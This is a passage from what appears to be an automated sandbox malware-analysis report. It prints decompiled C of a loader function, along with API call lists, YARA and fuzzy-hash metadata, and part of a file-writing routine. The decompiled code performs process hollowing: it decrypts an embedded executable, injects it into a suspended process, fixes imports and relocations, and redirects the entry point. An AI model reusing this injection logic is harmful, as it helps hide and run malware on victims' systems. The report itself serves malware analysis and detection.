				CHAR* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				void* _v28;
				void* _v32;
				CHAR** _v36;
				long _v40;
				struct _PROCESS_INFORMATION _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				char _v80;
				char _v83;
				intOrPtr _v87;
				char _v88;
				intOrPtr _v92;
				long _v100;
				long _v108;
				intOrPtr _v128;
				char _v132;
				struct _STARTUPINFOW _v200;
				struct _CONTEXT _v916;
				int _t154;
				CHAR* _t155;
				CHAR* _t156;
				void* _t160;
				void* _t161;
				CHAR* _t162;
				CHAR* _t163;
				CHAR* _t175;
				CHAR* _t178;
				intOrPtr _t179;
				CHAR** _t180;
				CHAR* _t186;
				CHAR* _t190;
				CHAR* _t194;
				void* _t197;
				long _t199;
				CHAR* _t208;
				signed short _t211;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				intOrPtr _t218;
				CHAR* _t225;
				CHAR* _t229;
				void* _t234;
				void* _t235;
				CHAR* _t250;
				CHAR* _t261;
				CHAR* _t266;
				CHAR** _t273;
				CHAR* _t275;
				CHAR* _t278;
				CHAR* _t284;
				signed int _t285;
				signed int _t286;
				struct HINSTANCE__* _t287;
				CHAR** _t288;
				CHAR* _t291;
				long _t294;
				CHAR* _t295;
				_Unknown_base(*)()** _t297;
				CHAR** _t299;
				intOrPtr _t301;
				long _t304;
				void* _t305;
				void* _t307;
				CHAR* _t309;
				signed short* _t310;
				CHAR** _t311;
				void* _t312;
				signed short* _t314;
				CHAR* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t324;

				_t287 = __edx;
				_t280 = __ecx;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v72 = 0;
				_v40 = 0;
				_v20 = 0;
				_v64 = 0;
				_v60 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v76 = 0;
				_v24 = 0;
				asm("movups [ebp-0x80], xmm0");
				asm("movq [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				asm("movq [ebp-0x68], xmm0");
				asm("movups [ebp-0x34], xmm0");
				E00401BB0( &_v200, 0, 0x44);
				E00401BB0( &_v916, 0, 0x2cc);
				_v200.cb = 0x44;
				_t317 = _t316 + 0x18;
				_t324 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t324 != 0) {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t317 = _t317 + 0x10;
				}
				_t154 = CreateProcessW(0, _a4, 0, 0, 0, 0x8000004, 0, 0,  &_v200,  &_v56);
				if(_t154 != 0) {
					_t155 =  *0x5d108c;
					__eflags = _t155;
					if(_t155 != 0) {
						_t280 =  &_v132;
						_t156 =  *_t155(_v56.hProcess, 0,  &_v132, 0x18, 0);
						__eflags = _t156;
						if(_t156 != 0) {
							goto L9;
						} else {
							_t175 = ReadProcessMemory(_v56.hProcess, _v128 + 8,  &_v12, 4,  &_v40);
							__eflags = _t175;
							if(_t175 == 0) {
								goto L8;
							} else {
								__eflags = _v40 - 4;
								if(_v40 != 4) {
									goto L8;
								} else {
									goto L21;
								}
							}
						}
					} else {
						_v916.ContextFlags = 0x10007;
						_t261 = GetThreadContext(_v56.hThread,  &_v916);
						__eflags = _t261;
						if(_t261 == 0) {
							L9:
							TerminateProcess(_v56.hProcess, 0);
							CloseHandle(_v56.hProcess);
							CloseHandle(_v56.hThread);
							_t160 = _v28;
							__eflags = _t160;
							if(_t160 != 0) {
								NtClose(_t160);
							}
							_t161 = _v32;
							__eflags = _t161;
							if(_t161 != 0) {
								NtClose(_t161);
							}
							_t162 = _v16;
							__eflags = _t162;
							if(_t162 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t162, _t287);
							}
							_t163 = _v8;
							__eflags = _t163;
							if(_t163 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t163, _t287);
							}
							__eflags = 0;
							return 0;
						} else {
							_t266 = ReadProcessMemory(_v56.hProcess, _v916.Ebx + 8,  &_v12, 4,  &_v40);
							__eflags = _t266;
							if(_t266 == 0) {
								L8:
								goto L9;
							} else {
								__eflags = _v40 - 4;
								if(_v40 == 4) {
									L21:
									_t178 = E00405A50(_t280, _v56.hProcess, _v12,  &_v20,  &_v72);
									_t318 = _t317 + 0x10;
									__eflags = _t178;
									if(_t178 == 0) {
										goto L8;
									} else {
										__eflags =  *0x40c038 - 0x5a4d; // 0x6b7d
										if(__eflags != 0) {
											goto L8;
										} else {
											_t179 =  *0x40c074; // 0x383538b7
											__eflags =  *((intOrPtr*)(_t179 + 0x40c038)) - 0x4550;
											_t180 = _t179 + 0x40c038;
											_v36 = _t180;
											if( *((intOrPtr*)(_t179 + 0x40c038)) != 0x4550) {
												goto L8;
											} else {
												__eflags =  *((intOrPtr*)(_t180 + 0x18)) - 0x10b;
												if( *((intOrPtr*)(_t180 + 0x18)) != 0x10b) {
													goto L8;
												} else {
													__eflags =  *(_t180 + 0xa0);
													_t304 =  *(_t180 + 0x50);
													_v68 =  *((intOrPtr*)(_t180 + 0x34));
													_t283 =  *((intOrPtr*)(_t180 + 0x28));
													_v80 =  *((intOrPtr*)(_t180 + 0x28));
													if(__eflags == 0) {
														goto L8;
													} else {
														_t294 = _v20;
														_v100 = _t294;
														__eflags = E00406F00(_t283, _t287, __eflags,  &_v28, 0xf001f, 0,  &_v100, 0x40, 0x8000000, 0);
														if(__eflags != 0) {
															goto L8;
														} else {
															_v108 = _t304;
															_t186 = E00406F00(_t283, _t287, __eflags,  &_v32, 0xf001f, 0,  &_v108, 0x40, 0x8000000, _t183);
															__eflags = _t186;
															if(_t186 != 0) {
																goto L8;
															} else {
																_v16 = _t186;
																_v64 = _t294;
																_t190 = E00406FE0(_t283, _t287, _v28, GetCurrentProcess(),  &_v16, 0, 0, 0,  &_v64, 1, _t186, 0x40);
																__eflags = _t190;
																if(_t190 != 0) {
																	goto L8;
																} else {
																	_v8 = _t190;
																	_v60 = _t304;
																	_t194 = E00406FE0(_t283, _t287, _v32, GetCurrentProcess(),  &_v8, 0, 0, 0,  &_v60, 1, _t190, 0x40);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		goto L8;
																	} else {
																		_v24 = _t194;
																		_t197 = E00406FE0(_t283, _t287, _v32, _v56.hProcess,  &_v24, 0, 0, 0,  &_v60, 1, _t194, 0x40);
																		__eflags = _t197;
																		if(_t197 != 0) {
																			goto L8;
																		} else {
																			_t305 = VirtualAlloc(_t197, _t294, 0x3000, 4);
																			__eflags = _t305;
																			if(_t305 == 0) {
																				goto L8;
																			} else {
																				_t199 = ReadProcessMemory(_v56.hProcess, _v12, _t305, _t294, 0);
																				__eflags = _t199;
																				if(_t199 != 0) {
																					E00401640(_v16, _t305, _t294);
																					VirtualFree(_t305, 0, 0x8000);
																					_t273 = _v36;
																					_t295 =  *(_t273 + 6) & 0x0000ffff;
																					_t82 = _t273 + 0x18; // 0x18
																					_t307 = _t82 + ( *(_t273 + 0x14) & 0x0000ffff);
																					E00401640(_v8, 0x40c038, (_t295 + _t295 * 4 << 3) - 0x40c038 + _t307);
																					_t320 = _t318 + 0x18;
																					__eflags = _t295;
																					if(_t295 != 0) {
																						_t315 = _t307 + 0x14;
																						__eflags = _t315;
																						do {
																							E00401640( *((intOrPtr*)(_t315 - 8)) + _v8,  *_t315 + 0x40c038,  *((intOrPtr*)(_t315 - 4)));
																							_t320 = _t320 + 0xc;
																							_t315 =  &(_t315[0x28]);
																							_t295 = _t295 - 1;
																							__eflags = _t295;
																						} while (_t295 != 0);
																					}
																					_t284 = _v8;
																					_t275 =  *((intOrPtr*)(_t273 + 0x80)) + _t284;
																					__eflags = _t275;
																					while(1) {
																						_t208 = _t275[0xc];
																						__eflags = _t208;
																						if(_t208 != 0) {
																							goto L40;
																						}
																						__eflags = _t275[4] - _t208;
																						if(_t275[4] == _t208) {
																							_t311 = _v36;
																							_t287 = _v24;
																							_v68 = _t287 - _v68;
																							_t299 =  *((intOrPtr*)(_t311 + 0xa0)) + _t284;
																							_t218 =  *((intOrPtr*)(_t311 + 0xa4)) + _t299;
																							_v36 = _t299;
																							_v92 = _t218;
																							__eflags = _t299 - _t218;
																							if(_t299 < _t218) {
																								while(1) {
																									_t250 =  *_t299;
																									__eflags = _t250;
																									if(_t250 == 0) {
																										break;
																									}
																									_t288 =  &(_t299[1]);
																									_v20 = _t288;
																									_t314 =  &(_t299[2]);
																									_t278 =  &(_t250[_t284]);
																									_t291 =  *_t288 - 8 >> 1;
																									__eflags = _t291;
																									if(_t291 != 0) {
																										_t301 = _v68;
																										do {
																											_t285 =  *_t314 & 0x0000ffff;
																											_t291 = _t291 - 1;
																											__eflags = (_t285 & 0x0000f000) - 0x3000;
																											if((_t285 & 0x0000f000) == 0x3000) {
																												_t286 = _t285 & 0x00000fff;
																												_t114 =  &(_t278[_t286]);
																												 *_t114 =  &(_t278[_t286][_t301]);
																												__eflags =  *_t114;
																											}
																											_t314 =  &(_t314[1]);
																											__eflags = _t291;
																										} while (_t291 != 0);
																										_t284 = _v8;
																										_t299 = _v36;
																									}
																									_t299 = _t299 +  *_v20;
																									_v36 = _t299;
																									__eflags = _t299 - _v92;
																									if(_t299 < _v92) {
																										continue;
																									}
																									break;
																								}
																								_t287 = _v24;
																							}
																							_v88 = 0x68;
																							_v87 = _v80 + _t287;
																							_v83 = 0xc3;
																							E00401640( &(_v16[_v72]),  &_v88, 6);
																							_t225 = E00407120(_t287, _v56.hProcess, _v12, 0);
																							__eflags = _t225;
																							if(_t225 != 0) {
																								goto L8;
																							} else {
																								_v76 = _v12;
																								_t229 = E00406FE0(_t284, _t287, _v28, _v56.hProcess,  &_v76, 0, 0, 0,  &_v64, 1, 0, 0x40);
																								__eflags = _t229;
																								if(_t229 != 0) {
																									goto L8;
																								} else {
																									E004071A0(_t284, _t287, _v56.hThread);
																									Sleep(0x1388);
																									_t312 = VirtualAlloc(0, 0x138, 0x3000, 4);
																									__eflags = _t312;
																									if(_t312 != 0) {
																										E00401BB0(_t312, 0, 0x138);
																										asm("cdq");
																										E004074D0(_t284, _t287, _v56.hProcess, _v24, _t287, _t312, 0x138,  &_v80);
																										VirtualFree(_t312, 0, 0x8000);
																									}
																									CloseHandle(_v56);
																									CloseHandle(_v56.hThread);
																									_t234 = _v28;
																									__eflags = _t234;
																									if(_t234 != 0) {
																										NtClose(_t234);
																									}
																									_t235 = _v32;
																									__eflags = _t235;
																									if(_t235 != 0) {
																										NtClose(_t235);
																									}
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v16, _t287);
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v8, _t287);
																									_t147 =  &(_v56.dwProcessId); // 0x40306e
																									return  *_t147;
																								}
																							}
																						} else {
																							goto L40;
																						}
																						goto L69;
																						L40:
																						_t287 = E00408B00( &(_t208[_t284]));
																						_t320 = _t320 + 4;
																						_v20 = _t287;
																						__eflags = _t287;
																						if(_t287 == 0) {
																							goto L8;
																						} else {
																							_t284 = _v8;
																							_t309 =  &(_t284[ *_t275]);
																							_t297 =  &(_t284[_t275[0x10]]);
																							__eflags = _t309 - _t284;
																							_t310 =  ==  ? _t297 : _t309;
																							__eflags = _t310 - _t284;
																							if(_t310 == _t284) {
																								goto L8;
																							} else {
																								_t211 =  *_t310;
																								__eflags = _t211;
																								if(_t211 == 0) {
																									L49:
																									_t275 =  &(_t275[0x14]);
																									continue;
																								} else {
																									while(1) {
																										__eflags = _t211;
																										if(_t211 >= 0) {
																											_t213 = _t211 + 2 + _t284;
																											__eflags = _t213;
																										} else {
																											_t213 = _t211 & 0x0000ffff;
																										}
																										_t214 = GetProcAddress(_t287, _t213);
																										 *_t297 = _t214;
																										__eflags = _t214;
																										if(_t214 == 0) {
																											goto L8;
																										}
																										_t211 = _t310[2];
																										_t310 =  &(_t310[2]);
																										_t284 = _v8;
																										_t297 = _t297 + 4;
																										__eflags = _t211;
																										if(_t211 == 0) {
																											goto L49;
																										} else {
																											_t287 = _v20;
																											continue;
																										}
																										goto L69;
																									}
																									goto L8;
																								}
																							}
																						}
																						goto L69;
																					}
																				} else {
																					VirtualFree(_t305, _t199, 0x8000);
																					goto L8;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					return _t154;
				}
				L69:
			}





















































































                                                                                                                                          0x00405420
                                                                                                                                          0x00405420
                                                                                                                                          0x0040542a
                                                                                                                                          0x0040542d
                                                                                                                                          0x0040543c
                                                                                                                                          0x00405446
                                                                                                                                          0x0040544d
                                                                                                                                          0x00405454
                                                                                                                                          0x0040545b
                                                                                                                                          0x00405462
                                                                                                                                          0x00405469
                                                                                                                                          0x00405470
                                                                                                                                          0x00405477
                                                                                                                                          0x0040547e
                                                                                                                                          0x00405485
                                                                                                                                          0x0040548c
                                                                                                                                          0x00405490
                                                                                                                                          0x00405495
                                                                                                                                          0x0040549a
                                                                                                                                          0x0040549f
                                                                                                                                          0x004054a3
                                                                                                                                          0x004054b6
                                                                                                                                          0x004054c0
                                                                                                                                          0x004054ca
                                                                                                                                          0x004054cd
                                                                                                                                          0x004054d4
                                                                                                                                          0x004054e7
                                                                                                                                          0x004054ec
                                                                                                                                          0x004054ec
                                                                                                                                          0x0040550e
                                                                                                                                          0x00405516
                                                                                                                                          0x0040551d
                                                                                                                                          0x0040552a
                                                                                                                                          0x0040552c
                                                                                                                                          0x004055eb
                                                                                                                                          0x004055f4
                                                                                                                                          0x004055f6
                                                                                                                                          0x004055f8
                                                                                                                                          0x00000000
                                                                                                                                          0x004055fa
                                                                                                                                          0x00405614
                                                                                                                                          0x00405616
                                                                                                                                          0x00405618
                                                                                                                                          0x00000000
                                                                                                                                          0x0040561e
                                                                                                                                          0x0040561e
                                                                                                                                          0x00405622
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405622
                                                                                                                                          0x00405618
                                                                                                                                          0x00405532
                                                                                                                                          0x00405538
                                                                                                                                          0x00405546
                                                                                                                                          0x0040554c
                                                                                                                                          0x0040554e
                                                                                                                                          0x00405583
                                                                                                                                          0x00405588
                                                                                                                                          0x00405597
                                                                                                                                          0x0040559c
                                                                                                                                          0x0040559e
                                                                                                                                          0x004055a1
                                                                                                                                          0x004055a3
                                                                                                                                          0x004055a6
                                                                                                                                          0x004055a6
                                                                                                                                          0x004055ac
                                                                                                                                          0x004055af
                                                                                                                                          0x004055b1
                                                                                                                                          0x004055b4
                                                                                                                                          0x004055b4
                                                                                                                                          0x004055ba
                                                                                                                                          0x004055bd
                                                                                                                                          0x004055bf
                                                                                                                                          0x004055c1
                                                                                                                                          0x004055c7
                                                                                                                                          0x004055c7
                                                                                                                                          0x004055cc
                                                                                                                                          0x004055cf
                                                                                                                                          0x004055d1
                                                                                                                                          0x004055d3
                                                                                                                                          0x004055d9
                                                                                                                                          0x004055d9
                                                                                                                                          0x004055e0
                                                                                                                                          0x004055e6
                                                                                                                                          0x00405550
                                                                                                                                          0x0040556d
                                                                                                                                          0x0040556f
                                                                                                                                          0x00405571
                                                                                                                                          0x0040557d
                                                                                                                                          0x00000000
                                                                                                                                          0x00405573
                                                                                                                                          0x00405573
                                                                                                                                          0x00405577
                                                                                                                                          0x00405628
                                                                                                                                          0x00405636
                                                                                                                                          0x0040563b
                                                                                                                                          0x0040563e
                                                                                                                                          0x00405640
                                                                                                                                          0x00000000
                                                                                                                                          0x00405646
                                                                                                                                          0x00405646
                                                                                                                                          0x0040564d
                                                                                                                                          0x00000000
                                                                                                                                          0x00405653
                                                                                                                                          0x00405653
                                                                                                                                          0x00405658
                                                                                                                                          0x00405662
                                                                                                                                          0x00405668
                                                                                                                                          0x0040566b
                                                                                                                                          0x00000000
                                                                                                                                          0x00405671
                                                                                                                                          0x00405676
                                                                                                                                          0x0040567a
                                                                                                                                          0x00000000
                                                                                                                                          0x00405680
                                                                                                                                          0x00405680
                                                                                                                                          0x0040568a
                                                                                                                                          0x0040568d
                                                                                                                                          0x00405690
                                                                                                                                          0x00405693
                                                                                                                                          0x00405696
                                                                                                                                          0x00000000
                                                                                                                                          0x0040569c
                                                                                                                                          0x0040569c
                                                                                                                                          0x004056b6
                                                                                                                                          0x004056bf
                                                                                                                                          0x004056c1
                                                                                                                                          0x00000000
                                                                                                                                          0x004056c7
                                                                                                                                          0x004056d2
                                                                                                                                          0x004056e1
                                                                                                                                          0x004056e6
                                                                                                                                          0x004056e8
                                                                                                                                          0x00000000
                                                                                                                                          0x004056ee
                                                                                                                                          0x004056f3
                                                                                                                                          0x00405703
                                                                                                                                          0x00405711
                                                                                                                                          0x00405716
                                                                                                                                          0x00405718
                                                                                                                                          0x00000000
                                                                                                                                          0x0040571e
                                                                                                                                          0x00405723
                                                                                                                                          0x00405733
                                                                                                                                          0x00405741
                                                                                                                                          0x00405746
                                                                                                                                          0x00405748
                                                                                                                                          0x00000000
                                                                                                                                          0x0040574e
                                                                                                                                          0x00405753
                                                                                                                                          0x0040576a
                                                                                                                                          0x0040576f
                                                                                                                                          0x00405771
                                                                                                                                          0x00000000
                                                                                                                                          0x00405777
                                                                                                                                          0x00405786
                                                                                                                                          0x00405788
                                                                                                                                          0x0040578a
                                                                                                                                          0x00000000
                                                                                                                                          0x00405790
                                                                                                                                          0x0040579a
                                                                                                                                          0x0040579c
                                                                                                                                          0x0040579e
                                                                                                                                          0x004057b7
                                                                                                                                          0x004057c7
                                                                                                                                          0x004057cd
                                                                                                                                          0x004057d0
                                                                                                                                          0x004057d4
                                                                                                                                          0x004057db
                                                                                                                                          0x004057f3
                                                                                                                                          0x004057f8
                                                                                                                                          0x004057fb
                                                                                                                                          0x004057fd
                                                                                                                                          0x004057ff
                                                                                                                                          0x004057ff
                                                                                                                                          0x00405802
                                                                                                                                          0x00405814
                                                                                                                                          0x00405819
                                                                                                                                          0x0040581c
                                                                                                                                          0x0040581f
                                                                                                                                          0x0040581f
                                                                                                                                          0x0040581f
                                                                                                                                          0x00405802
                                                                                                                                          0x0040582a
                                                                                                                                          0x0040582d
                                                                                                                                          0x0040582d
                                                                                                                                          0x00405830
                                                                                                                                          0x00405830
                                                                                                                                          0x00405833
                                                                                                                                          0x00405835
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405837
                                                                                                                                          0x0040583a
                                                                                                                                          0x004058ad
                                                                                                                                          0x004058b0
                                                                                                                                          0x004058b8
                                                                                                                                          0x004058c7
                                                                                                                                          0x004058c9
                                                                                                                                          0x004058cb
                                                                                                                                          0x004058ce
                                                                                                                                          0x004058d1
                                                                                                                                          0x004058d3
                                                                                                                                          0x004058d5
                                                                                                                                          0x004058d5
                                                                                                                                          0x004058d7
                                                                                                                                          0x004058d9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004058db
                                                                                                                                          0x004058de
                                                                                                                                          0x004058e1
                                                                                                                                          0x004058e6
                                                                                                                                          0x004058ec
                                                                                                                                          0x004058ec
                                                                                                                                          0x004058ee
                                                                                                                                          0x004058f0
                                                                                                                                          0x004058f3
                                                                                                                                          0x004058f3
                                                                                                                                          0x004058f6
                                                                                                                                          0x004058fe
                                                                                                                                          0x00405903
                                                                                                                                          0x00405905
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590e
                                                                                                                                          0x00405911
                                                                                                                                          0x00405911
                                                                                                                                          0x00405915
                                                                                                                                          0x00405918
                                                                                                                                          0x00405918
                                                                                                                                          0x0040591e
                                                                                                                                          0x00405920
                                                                                                                                          0x00405923
                                                                                                                                          0x00405926
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405926
                                                                                                                                          0x00405928
                                                                                                                                          0x00405928
                                                                                                                                          0x00405930
                                                                                                                                          0x00405934
                                                                                                                                          0x00405944
                                                                                                                                          0x00405948
                                                                                                                                          0x00405958
                                                                                                                                          0x0040595d
                                                                                                                                          0x0040595f
                                                                                                                                          0x00000000
                                                                                                                                          0x00405965
                                                                                                                                          0x0040596e
                                                                                                                                          0x00405985
                                                                                                                                          0x0040598a
                                                                                                                                          0x0040598c
                                                                                                                                          0x00000000
                                                                                                                                          0x00405992
                                                                                                                                          0x00405995
                                                                                                                                          0x0040599f
                                                                                                                                          0x004059b9
                                                                                                                                          0x004059bb
                                                                                                                                          0x004059bd
                                                                                                                                          0x004059c7
                                                                                                                                          0x004059dc
                                                                                                                                          0x004059e2
                                                                                                                                          0x004059ef
                                                                                                                                          0x004059ef
                                                                                                                                          0x004059fe
                                                                                                                                          0x00405a03
                                                                                                                                          0x00405a05
                                                                                                                                          0x00405a08
                                                                                                                                          0x00405a0a
                                                                                                                                          0x00405a0d
                                                                                                                                          0x00405a0d
                                                                                                                                          0x00405a13
                                                                                                                                          0x00405a16
                                                                                                                                          0x00405a18
                                                                                                                                          0x00405a1b
                                                                                                                                          0x00405a1b
                                                                                                                                          0x00405a2a
                                                                                                                                          0x00405a30
                                                                                                                                          0x00405a38
                                                                                                                                          0x00405a3e
                                                                                                                                          0x00405a43
                                                                                                                                          0x00405a4c
                                                                                                                                          0x00405a4c
                                                                                                                                          0x0040598c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x0040583c
                                                                                                                                          0x00405844
                                                                                                                                          0x00405846
                                                                                                                                          0x00405849
                                                                                                                                          0x0040584c
                                                                                                                                          0x0040584e
                                                                                                                                          0x00000000
                                                                                                                                          0x00405854
                                                                                                                                          0x00405854
                                                                                                                                          0x0040585c
                                                                                                                                          0x0040585e
                                                                                                                                          0x00405860
                                                                                                                                          0x00405862
                                                                                                                                          0x00405865
                                                                                                                                          0x00405867
                                                                                                                                          0x00000000
                                                                                                                                          0x0040586d
                                                                                                                                          0x0040586d
                                                                                                                                          0x0040586f
                                                                                                                                          0x00405871
                                                                                                                                          0x004058a8
                                                                                                                                          0x004058a8
                                                                                                                                          0x00000000
                                                                                                                                          0x00405873
                                                                                                                                          0x00405873
                                                                                                                                          0x00405873
                                                                                                                                          0x00405875
                                                                                                                                          0x0040587f
                                                                                                                                          0x0040587f
                                                                                                                                          0x00405877
                                                                                                                                          0x00405877
                                                                                                                                          0x00405877
                                                                                                                                          0x00405883
                                                                                                                                          0x00405889
                                                                                                                                          0x0040588b
                                                                                                                                          0x0040588d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405893
                                                                                                                                          0x00405896
                                                                                                                                          0x00405899
                                                                                                                                          0x0040589c
                                                                                                                                          0x0040589f
                                                                                                                                          0x004058a1
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a3
                                                                                                                                          0x004058a3
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a3
                                                                                                                                          0x00000000
                                                                                                                                          0x004058a1
                                                                                                                                          0x00000000
                                                                                                                                          0x00405873
                                                                                                                                          0x00405871
                                                                                                                                          0x00405867
                                                                                                                                          0x00000000
                                                                                                                                          0x0040584e
                                                                                                                                          0x004057a0
                                                                                                                                          0x004057a7
                                                                                                                                          0x00000000
                                                                                                                                          0x004057a7
                                                                                                                                          0x0040579e
                                                                                                                                          0x0040578a
                                                                                                                                          0x00405771
                                                                                                                                          0x00405748
                                                                                                                                          0x00405718
                                                                                                                                          0x004056e8
                                                                                                                                          0x004056c1
                                                                                                                                          0x00405696
                                                                                                                                          0x0040567a
                                                                                                                                          0x0040566b
                                                                                                                                          0x0040564d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405577
                                                                                                                                          0x00405571
                                                                                                                                          0x0040554e
                                                                                                                                          0x0040551c
                                                                                                                                          0x0040551c
                                                                                                                                          0x0040551c
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32 ref: 0040550E
                                                                                                                                          • GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00405597
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0040559C
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004055A6
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004055B4
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055C4
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055D6
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 00405614
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00405707
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405737
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405780
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040579A
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?), ref: 004057A7
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004057C7
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00405883
                                                                                                                                          • Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004), ref: 004059B3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,00000000,00000138,?), ref: 004059EF
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004059FE
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A03
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00405A0D
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00405A1B
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00405A2D
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 00405A3B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$Close$Current$Virtual$Handle$FreeMemoryRead$Alloc$AddressContextCreateProcSleepTerminateThread
                                                                                                                                          • String ID: 0125789244697858$D$h$n0@$I@
                                                                                                                                          • API String ID: 937709717-631519299
                                                                                                                                          • Opcode ID: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                                                          • Instruction ID: 0427067da74405bbc224276ff2be7b89c7662c3791b2ba589faee8c975da3b6f
                                                                                                                                          • Opcode Fuzzy Hash: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                                                          • Instruction Fuzzy Hash: CF124971E00609ABEB20DB94DD45FAFBBB9EF04704F144166FA04B72D1E778AD448B68
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004087C0, Relevance: 7.6, APIs: 5, Instructions: 74nativefileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00408823
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 0040887E
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004088A0
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004088AD
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004088B9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFilePath$CreateNameName_Write
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 589302162-0
                                                                                                                                          • Opcode ID: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                                                          • Instruction ID: cdde318fc824664ac6a874490e4e1e0a00434436370c8205e3f3d3f15e695731
                                                                                                                                          • Opcode Fuzzy Hash: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                                                          • Instruction Fuzzy Hash: D5310CB1D4020DBBEB10DF90DD49BEEBBB8EB04704F20415AF904B62D0D7B566589F99
                                                                                                                                          Uniqueness

